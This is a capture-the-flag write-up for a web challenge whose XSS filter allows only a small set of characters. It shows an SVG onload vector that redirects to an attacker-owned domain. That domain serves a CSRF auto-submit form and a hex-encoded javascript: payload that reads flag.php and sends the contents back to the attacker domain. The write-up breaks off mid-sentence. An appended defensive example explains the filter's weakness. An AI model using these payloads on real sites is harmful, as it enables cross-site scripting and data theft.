Tags: web xss 

Rating: 5.0

The task is an XSS filter that allows only these characters: ```a-zA-Z ~|_^\=<-+*```

For the attack we use this DOM-based vector:
```
<svg id=\ onload=location=id+id+12345609861+domain+id+1234+id
```

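It redirects to a domain we control, https://12345609861router.vip/1234/ ($12.95 + Let’s Encrypt). Inside the inline handler, ```id``` resolves to the element's id attribute (a backslash) and ```domain``` to document.domain, so the concatenation gives ```\\12345609861router.vip\1234\```, which the browser normalizes to ```//12345609861router.vip/1234/```.

That directory serves an index.html containing a CSRF form: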
```
<html>
<body>
<form id="send" action="https://router.vip/preview.php?" method="POST">
<input type="hidden" name="task" value="" />
<input type="hidden" name="payload" value="<svg onload=location=name" />
<input type="hidden" name="geetest_challenge" value="" />
<input type="hidden" name="geetest_validate" value="" />
<input type="hidden" name="geetest_seccode" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
window.name = "javascript:%76%61%72%20%78%68%72%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%0a%78%68%72%2e%6f%70%65%6e%28%27%47%45%54%27%2c%20%27%68%74%74%70%73%3a%2f%2f%72%6f%75%74%65%72%2e%76%69%70%2f%66%6c%61%67%2e%70%68%70%27%2c%20%66%61%6c%73%65%29%3b%0a%78%68%72%2e%73%65%6e%64%28%29%3b%0a%69%66%20%28%78%68%72%2e%73%74%61%74%75%73%20%3d%3d%20%32%30%30%29%20%7b%0a%20%20%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%73%3a%2f%2f%31%32%33%34%35%36%30%39%38%36%31%72%6f%75%74%65%72%2e%76%69%70%2f%31%32%33%34%2f%3f%72%65%73%75%6c%74%3d%27%2b%78%68%72%2e%72%65%73%70%6f%6e%73%65%54%65%78%74%3b%0a%7d";
document.getElementById("send").submit();
</script>
</body>
</html>
```

This vector sets window.name to a javascript: XSS payload and sends a POST request to preview with ```

Original writeup (https://goo.gl/8kyiYR).
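
Seen from the defender's side, the following added example (not part of the original writeup and not the challenge's code) shows why the character allowlist above accepts the ```<svg onload=location=name``` value and how output encoding neutralizes it. The regex, the function names and the preview markup are assumptions reconstructed from the allowed-character list; the real filter is not shown on the page.

```javascript
// Hypothetical reconstruction of the allowlist from the writeup:
// a-zA-Z, space, and ~ | _ ^ \ = < - + *
const ALLOWED = /^[a-zA-Z ~|_^\\=<\-+*]*$/;

function passesAllowlist(input) {
  return ALLOWED.test(input);
}

// Output encoding for HTML element content and quoted attribute values.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(input).replace(/[&<>"']/g, (c) => map[c]);
}

// Weak: trusts the allowlist and reflects the input as raw markup.
function renderPreviewWeak(input) {
  if (!passesAllowlist(input)) return null;
  return '<div class="preview">' + input + '</div>';
}

// Hardened: same filter, but the value is encoded at the point of output,
// so an accepted "<" can no longer open a tag.
function renderPreviewHardened(input) {
  if (!passesAllowlist(input)) return null;
  return '<div class="preview">' + escapeHtml(input) + '</div>';
}

// True when a raw tag opener survived into the generated HTML.
function containsRawTag(html) {
  return html !== null && /<svg\b/i.test(html);
}

// Constructed inputs: the payload field value from the form on this page,
// a benign string, and a string with characters outside the allowlist.
const samples = ['<svg onload=location=name', 'hello world', 'price > 10'];

for (const s of samples) {
  const weak = renderPreviewWeak(s);
  const hard = renderPreviewHardened(s);
  console.log(JSON.stringify(s),
    '| allowlist:', passesAllowlist(s),
    '| raw tag (weak):', containsRawTag(weak),
    '| raw tag (hardened):', containsRawTag(hard));
}
```

Because the allowlist admits ```<```, ```=``` and letters, a tag with an event handler that only references existing globals needs nothing the filter rejects; encoding at output removes that dependency on the filter.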